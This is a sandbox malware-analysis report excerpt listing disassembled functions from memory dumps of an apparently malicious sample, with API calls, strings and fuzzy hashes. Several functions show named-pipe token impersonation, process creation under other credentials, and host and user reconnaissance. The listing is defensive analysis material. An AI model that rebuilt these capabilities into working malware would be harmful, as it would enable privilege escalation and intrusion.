free.LIBCMT ref: 036AF44C
free.LIBCMT ref: 036AF477
free.LIBCMT ref: 036AF498
free.LIBCMT ref: 036AF4B1
free.LIBCMT ref: 036AF4E2

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: free$_errno
String ID:
API String ID: 2288870239-0
Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
Instruction ID: 40dc98199a79a58133558adad2f3082212b050be85bb74998ff8580c34cc7cea
Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
Instruction Fuzzy Hash: A3318234269E0A8FEB64EB6CEE9476473D1F759316F64042D800AC62A0CA3C8C55CF16

Function 00401D50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 185COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00401E69

Strings

Address %p has no image-section, xrefs: 00401DC0
VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
VirtualProtect failed with code 0x%x, xrefs: 00401F56
Mingw-w64 runtime failure:, xrefs: 00401D88

Memory Dump Source

Source File: 00000000.00000002.3883643343.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3883624426.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883676568.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883695881.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3883714058.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2HSalvXIJE.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
Instruction ID: 10d76aa513752d408286ffc26ec959f6f169e193d9772deefbdc98a11bb0eab9
Opcode Fuzzy Hash: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
Instruction Fuzzy Hash: 2C51DFB2701B4086DB109F26E94475E77A1F799BA4F58423AEF98233E1EA3CC485C748

Function 03ABA348 Relevance: 12.1, APIs: 8, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 03ABA375

Part of subcall function 03AB3E58: _FF_MSGBANNER.LIBCMT ref: 03AB3E75
Part of subcall function 03AB3E58: _NMSG_WRITE.LIBCMT ref: 03AB3E7F

_lock.LIBCMT ref: 03ABA388
_lock.LIBCMT ref: 03ABA3E3
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 03ABA3F8
EnterCriticalSection.KERNEL32 ref: 03ABA414
LeaveCriticalSection.KERNEL32 ref: 03ABA424
_calloc_crt.LIBCMT ref: 03ABA49A
__lock_fhandle.LIBCMT ref: 03ABA502

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CriticalSection$_lock$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
String ID:
API String ID: 854778215-0
Opcode ID: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
Instruction ID: ffdd61238fb607b3527faadb507f39d1cd63d2d23bed04940ce3adc1e000c1b9
Opcode Fuzzy Hash: 37ad4fda8a075f5cd4d07cec490ae037cae96ac67048c51c0eece2b82dd4d161
Instruction Fuzzy Hash: 8251F036710B8082CF25CF24D5443A9B7BDFB94B98F09461ACE8E4B7A2DB78C951C701

Function 03693A53 Relevance: 11.6, APIs: 9, Instructions: 305COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03693AF0

Part of subcall function 036AE6CB: _FF_MSGBANNER.LIBCMT ref: 036AE6FB
Part of subcall function 036AE6CB: _NMSG_WRITE.LIBCMT ref: 036AE705
Part of subcall function 036AE6CB: _callnewh.LIBCMT ref: 036AE739
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE744
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE74F

malloc.LIBCMT ref: 03693AFA

Part of subcall function 036AE6CB: _callnewh.LIBCMT ref: 036AE75F
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE764

malloc.LIBCMT ref: 03693B05
free.LIBCMT ref: 03693CC5
free.LIBCMT ref: 03693CCD
free.LIBCMT ref: 03693CD5

Part of subcall function 03694937: malloc.LIBCMT ref: 03694981
Part of subcall function 03694937: malloc.LIBCMT ref: 0369498C
Part of subcall function 03694937: free.LIBCMT ref: 03694A73
Part of subcall function 03694937: free.LIBCMT ref: 03694A7B

free.LIBCMT ref: 03693CE1
free.LIBCMT ref: 03693CEE
free.LIBCMT ref: 03693CFB

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh
String ID:
API String ID: 4160633307-0
Opcode ID: 78c5723810e6e6d18fab4a62d391ea0db65c57382cb75ed74f6abc212771b6cb
Instruction ID: a177285afbcb6d2b2f8798e362b59fa6b6e514e9a5ea22047de2cf874047ec45
Opcode Fuzzy Hash: 78c5723810e6e6d18fab4a62d391ea0db65c57382cb75ed74f6abc212771b6cb
Instruction Fuzzy Hash: A981D538318F0D8BDB29EB6C985177A73D9EB85600F54066FD48BC7352EE20DC07868A

Function 03A9460C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03A946A9

Part of subcall function 03AAF284: _FF_MSGBANNER.LIBCMT ref: 03AAF2B4
Part of subcall function 03AAF284: _NMSG_WRITE.LIBCMT ref: 03AAF2BE
Part of subcall function 03AAF284: HeapAlloc.KERNEL32 ref: 03AAF2D9
Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF2F2
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF2FD
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF308

malloc.LIBCMT ref: 03A946B3

Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF318
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF31D

malloc.LIBCMT ref: 03A946BE
free.LIBCMT ref: 03A9487E
free.LIBCMT ref: 03A94886
free.LIBCMT ref: 03A9488E

Part of subcall function 03A954F0: malloc.LIBCMT ref: 03A9553A
Part of subcall function 03A954F0: malloc.LIBCMT ref: 03A95545
Part of subcall function 03A954F0: free.LIBCMT ref: 03A9562C
Part of subcall function 03A954F0: free.LIBCMT ref: 03A95634

free.LIBCMT ref: 03A9489A
free.LIBCMT ref: 03A948A7
free.LIBCMT ref: 03A948B4

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh$AllocHeap
String ID:
API String ID: 3534990644-0
Opcode ID: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
Instruction ID: 7bdd9cf22c60a76a2295c86c97e40ea0749eb9694400bfc6ef87fe47576a736e
Opcode Fuzzy Hash: cc81e054d2004eb51c8bee4b84b58d4814fb308bd44c01250cbaa5dfc0e514d5
Instruction Fuzzy Hash: CE61E4277147C58AEF29DB6B985076AB795F789BC8F44815BCD466BB04DB38C006C700

Function 03AAB47C Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 258COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 03AA5FEC: malloc.LIBCMT ref: 03AA6008

malloc.LIBCMT ref: 03AAB528

Part of subcall function 03AAF284: _FF_MSGBANNER.LIBCMT ref: 03AAF2B4
Part of subcall function 03AAF284: _NMSG_WRITE.LIBCMT ref: 03AAF2BE
Part of subcall function 03AAF284: HeapAlloc.KERNEL32 ref: 03AAF2D9
Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF2F2
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF2FD
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF308

Part of subcall function 03AAEAA8: malloc.LIBCMT ref: 03AAEAF8

GetComputerNameExA.KERNEL32 ref: 03AAB5EA
GetComputerNameA.KERNEL32 ref: 03AAB61F
GetUserNameA.ADVAPI32 ref: 03AAB654

Part of subcall function 03A9F014: WSASocketA.WS2_32 ref: 03A9F042

malloc.LIBCMT ref: 03AAB76D

Strings

VUUU, xrefs: 03AAB6B0

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
String ID: VUUU
API String ID: 632458648-2040033107
Opcode ID: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
Instruction ID: d668c7eb2f009a66c2d23fb31f5d1cd9de7ee584770dab5530e5221b64aece69
Opcode Fuzzy Hash: 05713f2820868472ca49688c2b85268c5ac8a6a8808567d94079f7d4b5d3be16
Instruction Fuzzy Hash: 1991022B700FA086DF14EB6ED9603AD26A6BB89BC5F84402BCD8A5F754DF3CC5058760

Function 03AA1478 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128processCOMMON

Download Yara Rule

APIs

Part of subcall function 03AA5FEC: malloc.LIBCMT ref: 03AA6008

GetStartupInfoA.KERNEL32 ref: 03AA1540

Part of subcall function 03A9FE54: MultiByteToWideChar.KERNEL32 ref: 03A9FE81
Part of subcall function 03A9FE54: MultiByteToWideChar.KERNEL32 ref: 03A9FEA9

GetCurrentDirectoryW.KERNEL32 ref: 03AA15CD
GetCurrentDirectoryW.KERNEL32 ref: 03AA15DC
CreateProcessWithLogonW.ADVAPI32 ref: 03AA1637
GetLastError.KERNEL32 ref: 03AA1641

Strings

%s as %s\%s: %d, xrefs: 03AA1647

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
String ID: %s as %s\%s: %d
API String ID: 3435635427-816037529
Opcode ID: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
Instruction ID: e1ee02e9befd1797756d54e6d67f8662d6db83f31f1e439122328958efdb95af
Opcode Fuzzy Hash: bd007c1fecfa8e9c64263907c3ef2a9985436de431c3054d3c53bc822cf7e9f1
Instruction Fuzzy Hash: EC513736718B8186DB60DF1AB84075AB7AAF789B80F54412ADF8D97B28DF38C555CB00

Function 036AF257 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 036AF27D

Part of subcall function 036B115F: _getptd_noexit.LIBCMT ref: 036B1163

_invalid_parameter_noinfo.LIBCMT ref: 036AF289
__crtIsPackagedApp.LIBCMT ref: 036AF29A
_dosmaperr.LIBCMT ref: 036AF2E4

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 2917016420-0
Opcode ID: cfbfe809ff06962f400f8854e8dfaca57605153f463412cb5835124c7fa4a529
Instruction ID: 4cb26f4bd2f03712bef206817349a584adcc01df296044882013e6b9c4dfb14f
Opcode Fuzzy Hash: cfbfe809ff06962f400f8854e8dfaca57605153f463412cb5835124c7fa4a529
Instruction Fuzzy Hash: 1B31E134714F098FEB44EF7C9C1436976E1FB89315F18466DA44ACB2A1EB38C8418B47

Function 03AAE98C Relevance: 10.6, APIs: 7, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 03AAE9D7
OpenProcessToken.ADVAPI32 ref: 03AAE9FB
GetLastError.KERNEL32 ref: 03AAEA05

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: ErrorLast$OpenProcessToken
String ID:
API String ID: 2009710997-0
Opcode ID: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
Instruction ID: ed5b377c232756ee17727b622870b57339558e6e24024a6255d6c94379825bd0
Opcode Fuzzy Hash: 12a3f9e128b967964898bf965f43ef985f021f837df021f2e119c6413e458a11
Instruction Fuzzy Hash: 5E21F436314B0082FF11EF6AE850B2AA7A4FBC9B91F08543A9E8A87715DF3CC445CB40

Function 036B9B83 Relevance: 10.6, APIs: 7, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 036B9B9C

Part of subcall function 036B115F: _getptd_noexit.LIBCMT ref: 036B1163

__lock_fhandle.LIBCMT ref: 036B9BE4
__doserrno.LIBCMT ref: 036B9C19
_errno.LIBCMT ref: 036B9C20
_unlock_fhandle.LIBCMT ref: 036B9C30

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
String ID:
API String ID: 4120058822-0
Opcode ID: 9341880fa3ae8ea43da77f4714028596b22b009dd5c4526b8d460d71b2af8a07
Instruction ID: e44fc1a3915fdef9c5f7297f492542ec3a59259a05d55e257a385458e4f0336a
Opcode Fuzzy Hash: 9341880fa3ae8ea43da77f4714028596b22b009dd5c4526b8d460d71b2af8a07
Instruction Fuzzy Hash: 7E210531708B458FD724EFA8D8E42A97AF2EB47314F05016CD61A8B3A2D7B858C18F59

Function 03ABFBD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03ABFC04

Part of subcall function 03AB1600: _getptd.LIBCMT ref: 03AB1616
Part of subcall function 03AB1600: __updatetlocinfo.LIBCMT ref: 03AB164B
Part of subcall function 03AB1600: __updatetmbcinfo.LIBCMT ref: 03AB1672

_errno.LIBCMT ref: 03ABFC1F
_invalid_parameter_noinfo.LIBCMT ref: 03ABFC2A

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 3191669884-0
Opcode ID: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
Instruction ID: e0136a1543c8f6e7baa5a354db74995bf4bdebb8199b113d82d46e39f7d44af4
Opcode Fuzzy Hash: 04a51c6534ba67d8c2ce71a0e6c0b8946822a3beaaa0ad6abf8e1e016199c0f5
Instruction Fuzzy Hash: 9B215C767147848ADB11DF12998869EB7B8F786BE0F6C4227DE5807B5ACB34C991CB00

Function 03AA596C Relevance: 10.6, APIs: 7, Instructions: 52COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03AA597D
ioctlsocket.WS2_32 ref: 03AA599E
GetTickCount.KERNEL32 ref: 03AA59E3
ioctlsocket.WS2_32 ref: 03AA5A05

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CountTickioctlsocket
String ID:
API String ID: 3686034022-0
Opcode ID: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
Instruction ID: ca6bfff2c05fde5a7499073f90e75361e3a9f919c5aaecf86101eb05daff3c37
Opcode Fuzzy Hash: 178b23397deac81d3d51abbf71857af196517098d1f0b7b181b2ee049de2b99e
Instruction Fuzzy Hash: AB112932704E8446EB10CBAEEC44359B324E786BB4F544525DAD98BAA0DF7CC989C715

Function 03AA0AA0 Relevance: 10.5, APIs: 7, Instructions: 45pipethreadfileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 03AA0AC6
ConnectNamedPipe.KERNEL32 ref: 03AA0ADC
ReadFile.KERNEL32 ref: 03AA0B06
ImpersonateNamedPipeClient.ADVAPI32 ref: 03AA0B17
GetCurrentThread.KERNEL32 ref: 03AA0B21
OpenThreadToken.ADVAPI32 ref: 03AA0B39
DisconnectNamedPipe.KERNEL32 ref: 03AA0B4F

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
String ID:
API String ID: 4232080776-0
Opcode ID: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
Instruction ID: f30ba9d0740b4ccba35a11c91f6958a8b1324851132a2d6e6c7ff793ad551c32
Opcode Fuzzy Hash: ef7db9755eefa0db9f7ee1ec6e209610e40617530726d74f2edde71b678aab6d
Instruction Fuzzy Hash: FF117332720A4486FB52EB25FC4476A7379FB95B44F88591B888A87A70CF3CC64DC712

Function 03AB0B10 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03AB0B4C

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

_invalid_parameter_noinfo.LIBCMT ref: 03AB0B57
memcpy_s.LIBCMT ref: 03AB0C1C
_fileno.LIBCMT ref: 03AB0C87
_filbuf.LIBCMT ref: 03AB0CB5
_errno.LIBCMT ref: 03AB0D05

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
String ID:
API String ID: 2328795619-0
Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
Instruction ID: 2f87fe7a2c34978791b0625b4ee143f1dfb0f45e44561522b294f5dbb2200415
Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
Instruction Fuzzy Hash: CE51253270475086DA18CB2699046EBF6B8F785BF8F1C872B9E7947BD6CB38D0918340

Function 03AA1694 Relevance: 9.1, APIs: 6, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 03AA5FEC: malloc.LIBCMT ref: 03AA6008

Part of subcall function 03AB0620: _errno.LIBCMT ref: 03AB0577
Part of subcall function 03AB0620: _invalid_parameter_noinfo.LIBCMT ref: 03AB0582

fseek.LIBCMT ref: 03AA1730

Part of subcall function 03AB0EA4: _errno.LIBCMT ref: 03AB0ECC
Part of subcall function 03AB0EA4: _invalid_parameter_noinfo.LIBCMT ref: 03AB0ED7

_ftelli64.LIBCMT ref: 03AA1738

Part of subcall function 03AB0F18: _errno.LIBCMT ref: 03AB0F36
Part of subcall function 03AB0F18: _invalid_parameter_noinfo.LIBCMT ref: 03AB0F41

fseek.LIBCMT ref: 03AA1748

Part of subcall function 03AB0EA4: _fseek_nolock.LIBCMT ref: 03AB0EF5

GetFullPathNameA.KERNEL32 ref: 03AA176B
malloc.LIBCMT ref: 03AA1788

Part of subcall function 03AAF284: _FF_MSGBANNER.LIBCMT ref: 03AAF2B4
Part of subcall function 03AAF284: _NMSG_WRITE.LIBCMT ref: 03AAF2BE
Part of subcall function 03AAF284: HeapAlloc.KERNEL32 ref: 03AAF2D9
Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF2F2
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF2FD
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF308

Part of subcall function 03A9D044: malloc.LIBCMT ref: 03A9D057

Part of subcall function 03A9D074: htonl.WS2_32 ref: 03A9D07F

fclose.LIBCMT ref: 03AA1845

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
String ID:
API String ID: 3587854850-0
Opcode ID: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
Instruction ID: 32f5d112983f26a527770836251106a47fa84c0aca7a35ea95c1e0d9e835794a
Opcode Fuzzy Hash: f2abbbf20f3530519e2fbcb7cf3f65dd4e7c47c251f31922550871d18ad798e2
Instruction Fuzzy Hash: EB41C326310B8082DA04EB26E95476EB3A5F7C9BD0F448227DE5E5BB94DF3CC546CB00

Function 03AA5C60 Relevance: 9.1, APIs: 6, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32 ref: 03AA5C78
GetOEMCP.KERNEL32 ref: 03AA5C82
GetCurrentProcessId.KERNEL32 ref: 03AA5CA8
GetTickCount.KERNEL32 ref: 03AA5CB0

Part of subcall function 03AB044C: _getptd.LIBCMT ref: 03AB0454

GetCurrentProcess.KERNEL32 ref: 03AA5CEC

Part of subcall function 03AA0C64: GetModuleHandleA.KERNEL32 ref: 03AA0C79
Part of subcall function 03AA0C64: GetProcAddress.KERNEL32 ref: 03AA0C89

GetCurrentProcessId.KERNEL32 ref: 03AA5D5E

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
String ID:
API String ID: 3426420785-0
Opcode ID: cace55278df1f4be28c563725835e26b24be87b65be8dda4f354c1bcfac1d593
